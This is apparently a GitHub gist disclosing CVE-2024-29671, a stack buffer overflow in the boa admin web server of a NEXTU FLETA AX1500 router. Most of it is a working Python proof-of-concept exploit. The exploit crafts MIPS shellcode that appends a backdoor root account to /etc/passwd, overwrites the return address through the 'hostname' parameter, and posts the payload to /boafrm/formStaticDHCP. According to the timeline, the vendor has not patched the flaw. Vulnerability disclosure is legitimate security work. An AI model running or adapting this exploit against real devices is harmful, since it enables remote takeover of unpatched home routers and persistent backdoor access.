Skip to content

Instantly share code, notes, and snippets.

@laskdjlaskdj12
Last active February 6, 2025 21:49
Show Gist options
  • Save laskdjlaskdj12/4afc8b5d75640bd28eaf32de3ceda48a to your computer and use it in GitHub Desktop.
Save laskdjlaskdj12/4afc8b5d75640bd28eaf32de3ceda48a to your computer and use it in GitHub Desktop.
CVE-2024-29671 POC

NEXTU FLETA Wifi6 Router RCE Exploit POC

This document describes how the CVE-2024-29671 vulnerability was exploited in the NEXTU FLATA AX1500 Router firmware.

[CVE ID]
CVE-2024-29671

[Vendor of Product]
NEXTU

[Product]
FLATA AX1500 Wifi6 Router

[Version]
1.0.2

[Vulnerability Type]
Buffer overflow

Vulnerability Description

Execution Environment

This router is based on the MIPS architecture using the Realtek chipset with Little-Endian.
The target router firmware version is v1.0.2.

This firmware include embedded web server name as "boa", which was last released in 2005.
However, this router uses the boa web server to provide an admin web page service that controls the router's firmware.

Cause of the vulnerability

The cause of the stack overflow is that the length value check was not performed in formStaticDHCP request handler. So the contents of the hostname parameter copied using strcpy() in the 0x00411c00 formStaticDHCP function. Which mean this make overlapping stack frame.

Exploit explain

If an attacker inserts a remote execution code and add the overwrites address in the RET area into the 'hostname' parameter value of the /boafrm/formStaticDHCP POST request, the Arbitrary code must be executed.

Vulnerability POC

from pwn import *  
from hackebds import *  
  
# id: rOOt  
# passwd: pwn3d  
  
def add_user_credential_shell_code():  
    context.update(arch='mips', os='linux', bits=32, endian='little')  
  
    cmd = "/bin/sh"  
    args = ["sh", "-c", "echo \"rOOt:XJ1GV.nyFFMoI:0:0:root:/:/bin/sh\" >> /etc/passwd"]  
  
    asmcode = shellcraft.mips.linux.execve(cmd, args) + shellcraft.mips.linux.exit()  
    shellcode = asm(asmcode)  
    return shellcode  
  
  
  
shellcode = add_user_credential_shell_code()  
  
print(shellcode)  
gap_code = (b'A') * 1282  

# insert RET Address by your own
# In this case, the address value is in the video below that execute RCE.
RET_address = (b'\xe0\x4e\xb9\x7f')  
stack_gap = (b'B') * 0x180  
  
final_code = gap_code + RET_address + stack_gap + shellcode  
  
import socket  
import ssl  
  
# Boa Webserver Connect Address
HOST = '192.168.1.254'  
PORT = 443  
  
context = ssl.create_default_context()  
context.set_ciphers('HIGH:!DH:!aNULL')  
context.check_hostname = False  
context.verify_mode = ssl.CERT_NONE  
  
with socket.create_connection((HOST, PORT)) as sock:  
    with context.wrap_socket(sock, server_hostname=HOST) as ssock:  
  
        # Make Request Body
        send_byte = b"ip_addr=AAA&mac_addr=AAA&static_dhcp=%00%00&addRsvIPFlag=%00%00&addRsvIP=%00%00&deleteSelRsvIP=%00%00&modifyRsvIP=AAA&hostname=" + final_code  
  
        # POST Request Header
        headers = b"POST /boafrm/formStaticDHCP HTTP/1.1\r\n" \  
                  b"Host: " + HOST.encode('utf-8') + b"\r\n" \  
                                                     b"Content-Type: application/octet-stream\r\n" \  
                                                     b"Content-Length: " + str(len(send_byte)).encode(  
            'utf-8') + b"\r\nConnection: close\r\n\r\n"  
  
        ssock.send(headers + send_byte)  
  
        response = b""  
        while True:  
            data = ssock.recv(1024)  
            if not data:  
                break  
            response += data  
  
        print(response.decode('utf-8'))

Exploit execution video

CVE-2024-29671.POC.mp4

Impact

This Vulnerability must occur RCE and DOS problems.

Timeline

2024-03-17: Vulnerability and Request CVE Number
2024-03-22: Assignment CVE Number - CVE-2024-29671
2024-03~ 2024-05: The report is delivered to the company
2024-05 - : There is no response about this vulnerability Security patch.

Discoverer

Ku In Hoe

Helped me to register this vulnerability

Assistant Prof. Seonghoon Jeong (Sookmyung Women’s University)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment